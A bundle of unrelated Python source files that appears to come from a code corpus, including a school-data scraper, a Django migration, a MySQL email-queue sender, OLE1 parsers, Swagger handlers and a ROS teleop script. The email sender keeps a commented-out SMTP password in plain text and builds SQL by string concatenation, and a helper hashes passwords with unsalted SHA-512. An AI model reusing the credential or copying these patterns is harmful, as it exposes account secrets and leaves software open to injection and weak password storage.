AREA_CONTACT_TABLE_NAME = "Area Contact"
AREA_TARGET_COMMUNITY_TABLE_NAME = "Area Target Community"
class AirtableGeographicAreaTypes:
AREA_TYPE_CITY = "City"
AREA_TYPE_POLYGON = "Polygon"
AREA_TYPE_REGION = "Region"
AREA_TYPE_STATE = "State"
AREA_TYPE_COUNTRY = "Country"
AREA_TYPE_DEFAULT_US = "Default (US)"
AREA_TYPE_DEFAULT_INTERNATIONAL = "Default (International)"
| python |
from csv import DictReader
from scrapy import Item
from pyproj import Proj, transform
from jedeschule.spiders.nordrhein_westfalen_helper import NordRheinWestfalenHelper
from jedeschule.spiders.school_spider import SchoolSpider
from jedeschule.items import School
# for an overview of the data provided by the State of
# Nordrhein-Westfalen, check out the overview page here:
# https://www.schulministerium.nrw.de/ministerium/open-government/offene-daten
class NordrheinWestfalenSpider(SchoolSpider):
name = 'nordrhein-westfalen'
start_urls = [
'https://www.schulministerium.nrw.de/BiPo/OpenData/Schuldaten/schuldaten.csv',
]
def parse(self, response):
body = response.body.decode('utf-8').splitlines()
# skip the first line which contains information about the separator
reader = DictReader(body[1:], delimiter=';')
for line in reader:
yield line
@staticmethod
def normalize(item: Item) -> School:
name = " ".join([item.get("Schulbezeichnung_1", ""),
item.get("Schulbezeichnung_2", ""),
item.get("Schulbezeichnung_3", "")]).strip()
helper = NordRheinWestfalenHelper()
right, high = item.get('UTMRechtswert'), item.get('UTMHochwert')
this_projection = Proj(item.get('EPSG'))
target_projection = Proj('epsg:4326')
lon, lat = transform(this_projection, target_projection, right, high)
return School(name=name,
id='NW-{}'.format(item.get('Schulnummer')),
address=item.get('Strasse'),
zip=item.get("PLZ"),
city=item.get('Ort'),
website=item.get('Homepage'),
email=item.get('E-Mail'),
legal_status=helper.resolve('rechtsform', item.get('Rechtsform')),
school_type=helper.resolve('schulform', item.get('Schulform')),
provider=helper.resolve('provider', item.get('Traegernummer')),
fax=f"{item.get('Faxvorwahl')}{item.get('Fax')}",
phone=f"{item.get('Telefonvorwahl')}{item.get('Telefon')}",
latitude=lat,
longitude=lon,
)
| python |
# Generated by Django 3.2 on 2022-02-12 21:34
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('reservations', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='reservation',
name='needed_capacity',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='reservations.reservationcapacity'),
),
migrations.AlterField(
model_name='reservation',
name='status',
field=models.CharField(choices=[('S', 'Scheduled'), ('A', 'Active'), ('D', 'Done')], default='S', max_length=1),
),
]
| python |
import hashlib
import os
import errno
def hashpasswd(passwd):
return hashlib.sha512(passwd.encode('utf-8')).hexdigest()
def create_path(path):
if not os.path.exists(os.path.dirname(path)):
try:
os.makedirs(os.path.dirname(path))
except OSError as exc: # Guard against race condition
if exc.errno != errno.EEXIST:
raise
class EvalBuilder:
_expressions = None
def __init__(self):
self._expressions = []
def append(self, expression):
self._expressions.append(expression)
def __str__(self):
if len(self._expressions) == 0:
return "True"
eval_string = "and_(True"
for expression in self._expressions:
eval_string += ","+expression
eval_string += ")"
return eval_string
def getEvalStr(self):
return self.__str__()
| python |
#!/usr/bin/untitled #created by Reyad
import smtplib
import json
# import datetime
# import mysql.connector
import pymysql
# import MySQLdb
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from datetime import datetime
# import datetime
from email.mime.application import MIMEApplication
from dotenv import load_dotenv
import os
from pathlib import Path # python3 only
from dotenv import load_dotenv
load_dotenv()
hostname = os.getenv("DB_HOST")
username = os.getenv("DB_USERNAME")
password = os.getenv("DB_PASSWORD")
database = os.getenv("DB_DATABASE")
# myConnection = mysql.connector.connect( host=hostname, user=username, passwd=password, db=database )
myConnection = pymysql.connect(host=hostname, user=username, passwd=password, db=database)
def email_queue(conn):
cur = conn.cursor()
maximum_total_mail = 300
# start email configuration setup
sql = "SELECT id,from_email,server_details, sent_total_mail, last_updated_date " \
"FROM email_configuration WHERE is_active=1 AND sent_total_mail >=" + str(maximum_total_mail) + ""
cur.execute(sql)
for id, from_email, server_details, sent_total_mail, last_updated_date in cur.fetchall():
application_updated_date = last_updated_date
current_date = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
datetimeFormat = '%Y-%m-%d %H:%M:%S'
date1 = str(application_updated_date)
diff = datetime.strptime(current_date, datetimeFormat) \
- datetime.strptime(date1, datetimeFormat)
# checking one day 24 hours after clear total mail
if diff.days >= 1:
query3 = "INSERT INTO email_configuration_history(from_email,sent_total_mail,server_details," \
"created_at,updated_at) VALUES(%s,%s,%s,%s,%s)"
args = (from_email, sent_total_mail, server_details, current_date, current_date)
cur.execute(query3, args)
query4 = "UPDATE email_configuration SET sent_total_mail = %s, updated_at = %s, last_updated_date = %s" \
" where id= %s"
data2 = (0, str(current_date), str(current_date), id)
cur.execute(query4, data2)
conn.commit()
# end of email configuration setup
config = "SELECT server_details,sent_total_mail, id " \
"FROM email_configuration WHERE is_active=1 AND sent_total_mail <="+str(maximum_total_mail)+" "
cur.execute(config)
row = cur.fetchone()
if row:
config_data = json.loads(row[0])
MAIL_USERNAME = config_data["MAIL_USERNAME"]
MAIL_PASSWORD = config_data["MAIL_PASSWORD"]
MAIL_HOST = config_data["MAIL_HOST"]
MAIL_PORT = config_data["MAIL_PORT"]
else:
print('Today Email Quata has been full. Please check email configuration table!')
exit()
# # Default configuration
# MAIL_USERNAME = '[email protected]'
# MAIL_PASSWORD = 'mKFxxgf3'
# MAIL_HOST = 'smtp.bidaquickserv.org'
# # MAIL_HOST = 'smtp.gmail.com'
# MAIL_PORT = 587 #tls
# #MAIL_PORT = 465 #ssl
# for details in cur.fetchall()
query = "SELECT id,email_to,email_cc,email_content,no_of_try,attachment,email_subject,attachment_certificate_name,"\
"app_id, service_id FROM email_queue WHERE email_status=0 AND email_to!='' ORDER BY id DESC LIMIT 5"
result = cur.execute(query)
count = 0
is_active = 1
smtp_response = ''
attachments = ''
if result > 0:
for id, email_to, email_cc, email_content, no_of_try, attachment, email_subject, attachment_certificate_name, app_id, service_id in cur.fetchall():
print("from: " + MAIL_USERNAME)
print('to', email_to)
# attachment certificate link
if attachment_certificate_name:
cer_exp = attachment_certificate_name.split('.')
if cer_exp[0] is not None: # cer_exp[0] = TABLE NAME, cer_exp[1] = FILED NAME
sql2 = "SELECT "+str(cer_exp[1])+" FROM "+str(cer_exp[0])+" where id= " + str(app_id) + " AND "+str(cer_exp[1])+"!='' "
result2 = cur.execute(sql2)
if result2 == 0:
continue
else:
certificate_link = cur.fetchone()
email_content = email_content.replace('{attachment}', certificate_link[0])
html = email_content
msg = MIMEMultipart('alternative')
msg["Subject"] = email_subject
msg["From"] = MAIL_USERNAME
msg["To"] = email_to
msg["Cc"] = email_cc
if msg["Cc"] is not None:
cc = msg["Cc"].split(",")
else:
cc = ['']
if msg["To"]:
msg["To"].split(",")
part2 = MIMEText(html, 'html')
msg.attach(part2)
# Attach pdf file to the email
if attachment:
attachment_file = MIMEApplication(open(attachment, "rb").read())
attachment_file.add_header('Content-Disposition', 'attachment', filename=attachment)
msg.attach(attachment_file)
try:
if MAIL_HOST == 'smtp.gmail.com':
server = smtplib.SMTP_SSL(host=MAIL_HOST, port=MAIL_PORT)
else:
server = smtplib.SMTP(MAIL_HOST, MAIL_PORT) # smtp tls premium server [email protected]
server.login(MAIL_USERNAME, MAIL_PASSWORD)
server.sendmail(str(msg["From"]), [msg["To"]] + cc, msg.as_string())
server.quit()
# server.ehlo()
status = 1
mail_messages = "Email has been sent on " + datetime.now().strftime('%Y-%m-%d %H:%M:%S')
count += 1
no_of_try += 1
except smtplib.SMTPException as e:
no_of_try = no_of_try + 1
if no_of_try > 10:
status = -9
else:
status = 0
mail_messages = 'Something went wrong...' + str(e)
smtp_response = str(e)
is_active = -9 # forcefully inactive
query1 = "UPDATE email_queue SET email_status = %s, no_of_try = %s where id= %s"
data = (status, no_of_try, id)
cur.execute(query1, data)
query2 = "UPDATE email_configuration SET is_active=%s,sent_total_mail =%s,updated_at =%s," \
"smtp_response=%s where id=%s "
data5 = (is_active, str(row[1]+count), datetime.now().strftime("%Y-%m-%d %H:%M:%S"), smtp_response, row[2])
cur.execute(query2, data5)
print(row[1]+count)
conn.commit()
print(mail_messages)
if count == 0:
print("No Email in queue to send! " + datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
print("Using MySQLdb…")
email_queue(myConnection)
myConnection.close()
| python |
from is_wire.core import Channel, Message, Subscription
from google.protobuf.struct_pb2 import Struct
import socket
channel = Channel("amqp://guest:[email protected]:30000")
subscription = Subscription(channel)
# Prepare request
struct = Struct()
struct.fields["value"].number_value = 1.0
request = Message(content=struct, reply_to=subscription)
# Make request
channel.publish(request, topic="Tester.Increment")
# Wait for reply with 1.0 seconds timeout
try:
reply = channel.consume(timeout=1.0)
struct = reply.unpack(Struct)
print('RPC Status:', reply.status, '\nReply:', struct)
except socket.timeout:
print('No reply :(')
| python |
import logging
from omega import __version__
from tests.interfaces.test_web_interfaces import TestWebInterfaces
logger = logging.getLogger(__name__)
class TestSys(TestWebInterfaces):
async def test_sever_version(self):
ver = await self.server_get("sys", "version", is_pickled=False)
self.assertEqual(__version__, ver)
| python |
from montague.ast import (
And,
Call,
ComplexType,
Exists,
ForAll,
IfAndOnlyIf,
IfThen,
Iota,
Lambda,
Not,
Or,
TYPE_ENTITY,
TYPE_EVENT,
TYPE_TRUTH_VALUE,
TYPE_WORLD,
Var,
)
def test_variable_to_str():
assert str(Var("a")) == "a"
def test_and_to_str():
assert str(And(Var("a"), Var("b"))) == "a & b"
def test_or_to_str():
assert str(Or(Var("a"), Var("b"))) == "a | b"
def test_if_then_to_str():
assert str(IfThen(Var("a"), Var("b"))) == "a -> b"
def test_if_and_only_if_to_str():
assert str(IfAndOnlyIf(Var("a"), Var("b"))) == "a <-> b"
def test_lambda_to_str():
tree = Lambda("x", And(Var("a"), Var("x")))
assert str(tree) == "λx.a & x"
assert tree.ascii_str() == "Lx.a & x"
# This formula is semantically invalid but that doesn't matter.
assert str(And(Lambda("x", Var("x")), Lambda("y", Var("y")))) == "[λx.x] & [λy.y]"
def test_call_to_str():
assert (
str(Call(Call(Var("P"), And(Var("a"), Var("b"))), Lambda("x", Var("x"))))
== "P(a & b, λx.x)"
)
assert str(Call(Var("P"), Var("x"))) == "P(x)"
def test_for_all_to_str():
tree = ForAll("x", Call(Var("P"), Var("x")))
assert str(tree) == "∀ x.P(x)"
assert tree.ascii_str() == "Ax.P(x)"
def test_exists_to_str():
tree = Exists("x", Call(Var("P"), Var("x")))
assert str(tree) == "∃ x.P(x)"
assert tree.ascii_str() == "Ex.P(x)"
def test_not_to_str():
assert str(Not(Var("x"))) == "~x"
assert str(Not(Or(Var("x"), Var("y")))) == "~[x | y]"
def test_binary_operators_to_str():
assert str(And(Or(Var("a"), Var("b")), Var("c"))) == "[a | b] & c"
assert str(Or(And(Var("a"), Var("b")), Var("c"))) == "a & b | c"
assert str(Or(Var("a"), Or(Var("b"), Var("c")))) == "a | b | c"
assert str(And(Var("a"), And(Var("b"), Var("c")))) == "a & b & c"
def test_nested_exists_and_for_all_to_str():
assert str(And(ForAll("x", Var("x")), Exists("x", Var("x")))) == "[∀ x.x] & [∃ x.x]"
def test_iota_to_str():
tree = Iota("x", Var("x"))
assert str(tree) == "ιx.x"
assert tree.ascii_str() == "ix.x"
def test_entity_to_str():
assert str(TYPE_ENTITY) == "e"
def test_event_to_str():
assert str(TYPE_EVENT) == "v"
def test_truth_value_to_str():
assert str(TYPE_TRUTH_VALUE) == "t"
def test_world_to_str():
assert str(TYPE_WORLD) == "s"
def test_recursive_type_to_str():
assert str(ComplexType(TYPE_ENTITY, TYPE_TRUTH_VALUE)) == "<e, t>"
def test_deeply_recursive_type_to_str():
assert (
str(
ComplexType(
TYPE_EVENT,
ComplexType(
ComplexType(TYPE_ENTITY, TYPE_TRUTH_VALUE),
ComplexType(TYPE_ENTITY, TYPE_TRUTH_VALUE),
),
)
)
== "<v, <<e, t>, <e, t>>>"
)
def test_recursive_type_to_concise_str():
typ = ComplexType(TYPE_ENTITY, TYPE_TRUTH_VALUE)
assert typ.concise_str() == "et"
def test_deeply_recursive_type_to_concise_str():
typ = ComplexType(
TYPE_EVENT,
ComplexType(
ComplexType(TYPE_ENTITY, TYPE_TRUTH_VALUE),
ComplexType(TYPE_ENTITY, TYPE_TRUTH_VALUE),
),
)
assert typ.concise_str() == "<v, <et, et>>"
def test_simple_replace_variable():
assert Var("x").replace_variable("x", Var("y")) == Var("y")
def test_replace_variable_in_and_or():
tree = And(Or(Var("x"), Var("y")), Var("z"))
assert tree.replace_variable("x", Var("x'")) == And(
Or(Var("x'"), Var("y")), Var("z")
)
def test_replace_predicate():
tree = Call(Var("P"), Var("x"))
assert tree.replace_variable("P", Var("Good")) == Call(Var("Good"), Var("x"))
def test_replace_variable_in_quantifiers():
tree = ForAll(
"x",
Or(And(ForAll("b", Var("b")), Exists("b", Var("b"))), Exists("y", Var("b"))),
)
assert tree.replace_variable("b", Var("bbb")) == ForAll(
"x",
Or(And(ForAll("b", Var("b")), Exists("b", Var("b"))), Exists("y", Var("bbb"))),
)
def test_recursive_replace_variable():
# BFP(x, Lx.x, x & y)
tree = Call(
Call(
Call(Var("BFP"), Var("x")),
Lambda("x", Var("x")), # This should not be replaced.
),
And(Var("x"), Var("y")),
)
assert tree.replace_variable("x", Var("j")) == Call(
Call(Call(Var("BFP"), Var("j")), Lambda("x", Var("x"))), And(Var("j"), Var("y"))
)
def test_replace_variable_in_iota():
tree = Iota("x", And(Var("x"), Var("y")))
assert tree.replace_variable("x", Var("a")) == tree
assert tree.replace_variable("y", Var("b")) == Iota("x", And(Var("x"), Var("b")))
| python |
from recommendation.api.types.related_articles import candidate_finder
from recommendation.utils import configuration
import recommendation
EXPECTED = [('Q22686', 1.0), ('Q3752663', 0.8853468379287844), ('Q2462124', 0.861691557168689),
('Q432473', 0.8481581254555062), ('Q242351', 0.8379904779822078), ('Q868772', 0.8087311692249578),
('Q21070387', 0.7956811552934058), ('Q239411', 0.7829732882093489), ('Q736223', 0.7760532537216831),
('Q3731533', 0.7474319215265643), ('Q699872', 0.6474165168034756), ('Q2597050', 0.6352709659245916),
('Q12071552', 0.6273134513051442), ('Q6294', 0.6132842610738145), ('Q13628723', 0.5921917468920406),
('Q359442', 0.5868018793427279), ('Q29468', 0.5696888764253161), ('Q76', 0.5616138355609682),
('Q2036942', 0.5538574999463601), ('Q324546', 0.5466022935973467), ('Q17092708', 0.5438881700622109),
('Q69319', 0.5400609632856112), ('Q846330', 0.5337995502586717), ('Q44430', 0.5300078863669737),
('Q816459', 0.5156321533144876), ('Q4496', 0.515222705930191), ('Q29552', 0.5072461049596773)]
def test_embedding():
candidate_finder.initialize_embedding(optimize=False)
results = candidate_finder.get_embedding().most_similar('Q22686')
for expected, actual in zip(EXPECTED, results):
assert expected[0] == actual[0]
assert isclose(expected[1], actual[1])
def test_configuration():
assert recommendation.__name__ == configuration.get_config_value('related_articles', 'embedding_package')
# math.isclose was added in 3.5
# https://www.python.org/dev/peps/pep-0485/#proposed-implementation
def isclose(a, b, rel_tol=1e-09, abs_tol=0.0):
return abs(a - b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol)
| python |
"""
Objects
Defining objects imitating the behavior of Python's built-in objects but linked to the database.
"""
from yuno.objects.dict import YunoDict
from yuno.objects.list import YunoList
| python |
import ptypes
from ptypes import *
## string primitives
class LengthPrefixedAnsiString(pstruct.type):
_fields_ = [
(pint.uint32_t, 'Length'),
(lambda s: dyn.clone(pstr.string, length=s['Length'].li.int()), 'String'),
]
def str(self):
return self['String'].li.str()
class LengthPrefixedUnicodeString(pstruct.type):
_fields_ = [
(pint.uint32_t, 'Length'),
(lambda s: dyn.clone(pstr.wstring, length=s['Length'].li.int()), 'String'),
]
def str(self):
return self['String'].li.str()
## PresentationObject Format
class PresentationObjectHeader(pstruct.type):
def __ClassName(self):
fmt = self['FormatID'].li.int()
if fmt == 5:
return LengthPrefixedAnsiString
return pstr.string
_fields_ = [
(pint.uint32_t, 'OLEVersion'),
(pint.uint32_t, 'FormatID'),
(__ClassName, 'ClassName'),
]
class PresentationObjectType(ptype.definition):
cache = {}
@PresentationObjectType.define(type='METAFILEPICT')
@PresentationObjectType.define(type='BITMAP')
@PresentationObjectType.define(type='DIB')
class StandardPresentationObject(pstruct.type):
class BitmapPresentationSize(pint.uint32_t): pass
class MetaFilePresentationSize(pint.uint32_t): pass
def __SizeType(self):
if self.type in ('BITMAP', 'DIB'):
return self.BitmapPresentationSize
if self.type in ('METAFILEPICT',):
return self.MetaFilePresentationSize
return pint.uint32_t
_fields_ = [
(__SizeType, 'Width'),
(__SizeType, 'Height'),
(pint.uint32_t, 'PresentationDataSize'),
(lambda s: dyn.block(s['PresentationDataSize'].li.int()), 'PresentationData'),
]
class ClipboardFormatHeader(pstruct.type): pass
@PresentationObjectType.define
class GenericPresentationObject(pstruct.type):
type = None
def __ClipboardObject(self):
fmt = self['Header'].li['ClipboardFormat'].int()
return ClipboardFormatType.withdefault(fmt, type=fmt)
_fields_ = [
(ClipboardFormatHeader, 'Header'),
(__ClipboardObject, 'Object'),
]
PresentationObjectType.default = GenericPresentationObject
## Clipboard Format (not be set to 0)
ClipboardFormatHeader._fields_ = [
(pint.uint32_t, 'ClipboardFormat')
]
class ClipboardFormatType(ptype.definition):
cache = {}
@ClipboardFormatType.define
class StandardClipboardFormatPresentationObject(pstruct.type):
type = None
_fields_ = [
(pint.uint32_t, 'PresentationDataSize'),
(lambda s: dyn.block(s['PresentationDataSize'].li.int()), 'PresentationData'),
]
ClipboardFormatType.default = StandardClipboardFormatPresentationObject
@ClipboardFormatType.define
class RegisteredClipboardFormatPresentationObject(pstruct.type):
type = 0x00000000
_fields_ = [
(pint.uint32_t, 'StringFormatDataSize'),
(lambda s: dyn.block(s['StringFormatDataSize'].li.int()), 'StringFormatData'),
(pint.uint32_t, 'PresentationDataSize'),
(lambda s: dyn.block(s['PresentationDataSize'].li.int()), 'PresentationData'),
]
## Object
class ObjectHeader(pstruct.type):
def __ClassName(self):
fmt = self['FormatID'].li.int()
if fmt == 5:
return LengthPrefixedAnsiString
return ptype.type
_fields_ = [
(pint.uint32_t, 'OLEVersion'),
(pint.uint32_t, 'FormatID'),
(__ClassName, 'ClassName'),
(LengthPrefixedAnsiString, 'TopicName'),
(LengthPrefixedAnsiString, 'ItemName'),
]
class ObjectType(ptype.definition):
cache = {}
@ObjectType.define
class EmbeddedObject(pstruct.type):
type = 0x00000002
_fields_ = [
(pint.uint32_t, 'NativeDataSize'),
(lambda s: dyn.block(s['NativeDataSize'].li.int()), 'NativeData'),
]
@ObjectType.define
class LinkedObject(pstruct.type):
type = 0x00000001
_fields_ = [
(LengthPrefixedAnsiString, 'NetworkName'),
(pint.uint32_t, 'Reserved'),
(pint.uint32_t, 'LinkUpdateOption'),
]
### OLE 1.0 Format Structures
class PresentationObject(pstruct.type):
def __PresentationObject(self):
fmt = self['Header'].li['FormatID'].int()
if fmt != 0:
clsname = self['Header']['ClassName'].str()
return PresentationObjectType.withdefault(clsname, type=clsname)
return ptype.type
_fields_ = [
(PresentationObjectHeader, 'Header'),
(__PresentationObject, 'Object'),
]
# Ole v1.0
class Object(pstruct.type):
def __Object(self):
fmtid = self['Header'].li['FormatID'].int()
return ObjectType.withdefault(fmtid, type=fmtid)
_fields_ = [
(ObjectHeader, 'Header'),
(__Object, 'Object'),
(PresentationObject, 'Presentation'),
]
if __name__ == '__main__':
pass
| python |
##############################################################################
# Copyright (c) 2016 ZTE Corporation
# [email protected]
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
##############################################################################
import inspect
import json
import tornado.template
import tornado.web
from opnfv_testapi.tornado_swagger import settings
def json_dumps(obj, pretty=False):
return json.dumps(obj,
sort_keys=True,
indent=4,
separators=(',', ': ')) if pretty else json.dumps(obj)
class SwaggerUIHandler(tornado.web.RequestHandler):
def initialize(self, **kwargs):
self.static_path = kwargs.get('static_path')
self.base_url = kwargs.get('base_url')
def get_template_path(self):
return self.static_path
def get(self):
resource_url = self.reverse_url(settings.RESOURCE_LISTING_NAME)
discovery_url = self.base_url + resource_url
self.render('swagger/index.html', discovery_url=discovery_url)
class SwaggerResourcesHandler(tornado.web.RequestHandler):
def initialize(self, **kwargs):
self.api_version = kwargs.get('api_version')
self.swagger_version = kwargs.get('swagger_version')
self.base_url = kwargs.get('base_url')
self.exclude_namespaces = kwargs.get('exclude_namespaces')
def get(self):
self.set_header('content-type', 'application/json')
resources = {
'apiVersion': self.api_version,
'swaggerVersion': self.swagger_version,
'basePath': self.base_url,
'apis': [{
'path': self.reverse_url(settings.API_DECLARATION_NAME),
'description': 'Restful APIs Specification'
}]
}
self.finish(json_dumps(resources, self.get_arguments('pretty')))
class SwaggerApiHandler(tornado.web.RequestHandler):
def initialize(self, **kwargs):
self.api_version = kwargs.get('api_version')
self.swagger_version = kwargs.get('swagger_version')
self.base_url = kwargs.get('base_url')
def get(self):
self.set_header('content-type', 'application/json')
apis = self.find_api(self.application.handlers)
if apis is None:
raise tornado.web.HTTPError(404)
specs = {
'apiVersion': self.api_version,
'swaggerVersion': self.swagger_version,
'basePath': self.base_url,
'resourcePath': '/',
'produces': ["application/json"],
'apis': [self.__get_api_spec__(path, spec, operations)
for path, spec, operations in apis],
'models': self.__get_models_spec(settings.models)
}
self.finish(json_dumps(specs, self.get_arguments('pretty')))
def __get_models_spec(self, models):
models_spec = {}
for model in models:
models_spec.setdefault(model.id, self.__get_model_spec(model))
return models_spec
@staticmethod
def __get_model_spec(model):
return {
'description': model.summary,
'id': model.id,
'notes': model.notes,
'properties': model.properties,
'required': model.required
}
@staticmethod
def __get_api_spec__(path, spec, operations):
return {
'path': path,
'description': spec.handler_class.__doc__,
'operations': [{
'httpMethod': api.func.__name__.upper(),
'nickname': api.nickname,
'parameters': api.params.values(),
'summary': api.summary,
'notes': api.notes,
'responseClass': api.responseClass,
'responseMessages': api.responseMessages,
} for api in operations]
}
@staticmethod
def find_api(host_handlers):
def get_path(url, args):
return url % tuple(['{%s}' % arg for arg in args])
def get_operations(cls):
return [member.rest_api
for (_, member) in inspect.getmembers(cls)
if hasattr(member, 'rest_api')]
for host, handlers in host_handlers:
for spec in handlers:
for (_, mbr) in inspect.getmembers(spec.handler_class):
if inspect.ismethod(mbr) and hasattr(mbr, 'rest_api'):
path = get_path(spec._path, mbr.rest_api.func_args)
operations = get_operations(spec.handler_class)
yield path, spec, operations
break
| python |
import sys
def raise_from(my_exception, other_exception):
raise my_exception, None, sys.exc_info()[2] # noqa: W602, E999
| python |
from flask import Flask
app = Flask(__name__)
@app.route('/hello/<name>')
def hello(name: str) -> str:
return f"Hello {name}!"
| python |
#!/usr/bin/env python
import roslib; roslib.load_manifest('teleop_twist_keyboard')
import rospy
from geometry_msgs.msg import Twist
import sys, select, termios, tty, rospy
import curses
msg = """
Reading from the keyboard and Publishing to Twist!
---------------------------
Moving options:
---------------------------
w -- up (+z)
s -- down (-z)
a -- counter clockwise yaw
d -- clockwise yaw
up arrow -- forward (+x)
down arrow -- backward (-x)
<- -- forward (+y)
-> -- backward (-y)
CTRL-C to quit
"""
print msg
def getKey():
tty.setraw(sys.stdin.fileno())
rlist, _, _ = select.select([sys.stdin], [], [], 0.2)
if rlist:
key = sys.stdin.read(1)
### if using arrow keys, need to retrieve 3 keys in buffer
if ord(key) == 27:
key = sys.stdin.read(1)
if ord(key) == 91:
key = sys.stdin.read(1)
else:
key = ''
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)
return key
if __name__=="__main__":
settings = termios.tcgetattr(sys.stdin)
rospy.init_node('teleop_twist_keyboard')
pub = rospy.Publisher('~cmd_vel', Twist, queue_size = 1)
v = rospy.get_param("~v", 2.0)
w = rospy.get_param("~w", 1.0)
rate = rospy.Rate(20) # 10hz
while not rospy.is_shutdown():
vx = 0
vy = 0
vz = 0
wy = 0
key = getKey()
if key == 'w':
vx = v
elif key == 's':
vx = -v
elif key == 'a':
vy = v
elif key == 'd':
vy = -v
elif key=='A':
vz = v
elif key=='B':
vz = -v
elif key=='C':
wy = -w
elif key=='D':
wy = w
if (key == '\x03'):
break
twist = Twist()
twist.linear.x = vx; twist.linear.y = vy; twist.linear.z = vz;
twist.angular.x = 0; twist.angular.y = 0; twist.angular.z = wy
pub.publish(twist)
rate.sleep()
| python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
from Box2D.b2 import contactListener
from parameters import *
from creatures import Animatronic
class nnContactListener(contactListener):
def __init__(self):
contactListener.__init__(self)
self.sensors = dict()
def BeginContact(self, contact):
f1, f2 = contact.fixtureA, contact.fixtureB
if "ground" in (f1.userData, f2.userData):
if isinstance(f1.userData, tuple):
# This fixture is an Animatronic sensor
self.sensors[f1.userData[0]][f1.userData[1]] = 1.0
elif isinstance(f1.userData, Animatronic):
# Detect body touching ground
if f1 == f1.userData.body.fixtures[0]:
self.sensors[f1.userData.id][-1] = True
if isinstance(f2.userData, tuple):
# This fixture is an Animatronic sensor
self.sensors[f2.userData[0]][f2.userData[1]] = 1.0
elif isinstance(f2.userData, Animatronic):
# Detect body touching ground
if f2 == f2.userData.body.fixtures[0]:
self.sensors[f2.userData.id][-1] = True
def EndContact(self, contact):
f1, f2 = contact.fixtureA, contact.fixtureB
if "ground" in (f1.userData, f2.userData):
if isinstance(f1.userData, tuple):
# This fixture is an Animatronic sensor
self.sensors[f1.userData[0]][f1.userData[1]] = 0.0
elif isinstance(f1.userData, Animatronic):
# Detect body touching ground
if f1 == f1.userData.body.fixtures[0]:
self.sensors[f1.userData.id][-1] = False
if isinstance(f2.userData, tuple):
# This fixture is an Animatronic sensor
self.sensors[f2.userData[0]][f2.userData[1]] = 0.0
elif isinstance(f2.userData, Animatronic) and f2.userData.body.fixtures: # Weird
# Detect body touching ground
if f2 == f2.userData.body.fixtures[0]:
self.sensors[f2.userData.id][-1] = False
def registerSensors(self, id, n):
"""
Args:
id: Animatronic unique identifier
n: number of sensor to register
"""
self.sensors[id] = [0.0]*(n+1) # Last slot for body touching ground
def unregisterSensors(self, id):
del self.sensors[id]
def breed(creatures):
# This function is weird...
if len(creatures) < 2:
return []
offspring = []
p1 = creatures[0]
for p2 in creatures[1:]:
offspring.append(p1.breed(p2))
return offspring + breed(creatures[1:])
def cross(array1, array2):
assert(array1.shape == array2.shape)
new_list = []
a1, a2 = array1.flat, array2.flat
for i in range(array1.size):
r = np.random.randint(2)
if r == 0:
# inherit from first parent
new_list.append(a1[i])
if r == 1:
# inherit from second parent
new_list.append(a2[i])
return np.array(new_list).reshape(array1.shape)
def cross2(array1, array2):
""" Cross function with whole genes instead of single nucleotides """
assert(array1.shape == array2.shape)
new_array = np.zeros_like(array1)
#a1, a2 = array1.flat, array2.flat
for i in range(array1.shape[1]):
r = np.random.randint(2)
if r == 0:
# inherit from first parent
new_array[:,i] = array1[:,i].copy()
if r == 1:
# inherit from second parent
new_array[:,i] = array2[:,i].copy()
return new_array
def sigmoid(x):
return 1 / (1+np.exp(-x))
def tanh(x):
# Better than sigmoid for our purpose
return (np.exp(x)-np.exp(-x)) / (np.exp(x)+np.exp(-x))
def relu(x):
return np.maximum(x, np.zeros_like(x))
def sigmoid_derivative(x):
return x*(1-x)
class NeuralNetwork:
activations = { "tanh": tanh,
"sigmoid": sigmoid,
"sigmoid_derivative": sigmoid_derivative,
"relu": relu}
def __init__(self):
self.save_state = False # Keep calculated values of neurons after feedforward for display purposes
def init_weights(self, layers):
self.weights = []
for i in range(len(layers)-1):
# Fill neural network with random values between -1 and 1
self.weights.append(np.random.uniform(size=(layers[i]+1, layers[i+1]), low=-1, high=1))
#def set_weights(self, weights):
# self.weights = weights
def set_activation(self, activation):
self.activation = activation.lower()
self.activation_f = self.activations[self.activation]
def get_layers(self):
""" Returns number of neurons in each layer (input and output layers included)
"""
n = len(self.weights)
return [len(self.weights[i])-1 for i in range(n)] + [len(self.weights[-1][0])]
def get_total_neurons(self):
layers = self.get_layers()
return sum(layers)
def get_total_synapses(self):
return sum([w.size for w in self.weights])
def feedforward(self, x):
self.output = np.array(x+[1.0]) # Add the bias unit
if self.save_state:
self.state = []
self.state.append(self.output.copy())
for i in range(0, len(self.weights)-1):
self.output = self.activation_f(np.dot(self.output, self.weights[i]))
self.output = np.append(self.output, 1.0) # Add the bias unit
if self.save_state:
self.state.append(self.output.copy())
self.output = self.activation_f(np.dot(self.output, self.weights[-1]))
if self.save_state:
self.state.append(self.output)
def copy(self):
new_nn = NeuralNetwork()
weights = []
for w in self.weights:
weights.append(w.copy())
new_nn.weights = weights
new_nn.set_activation(self.activation)
return new_nn
def compare_weights(self, other):
assert self.get_layers() == other.get_layers(), "neural network architectures are different"
diff = []
mutations = 0
for i in range(len(self.weights)):
diff.append(self.weights[i] == other.weights[i])
mutations += sum(self.weights[i] != other.weights[i])
print("{} mutation(s) ({}%)".format(mutations, mutations / self.get_total_synapses()))
return diff
| python |
# coding: utf-8
# Copyright (c) 2016, 2019, Oracle and/or its affiliates. All rights reserved.
import click
from services.waas.src.oci_cli_waas.generated import waas_cli
from oci_cli import cli_util
from oci_cli import custom_types # noqa: F401
from oci_cli import json_skeleton_utils
# oci waas purge-cache purge-cache --waas-policy-id, --resources
# to
# oci waas purge-cache --waas-policy-id, --resources
waas_cli.waas_root_group.commands.pop(waas_cli.purge_cache_group.name)
waas_cli.waas_root_group.add_command(waas_cli.purge_cache)
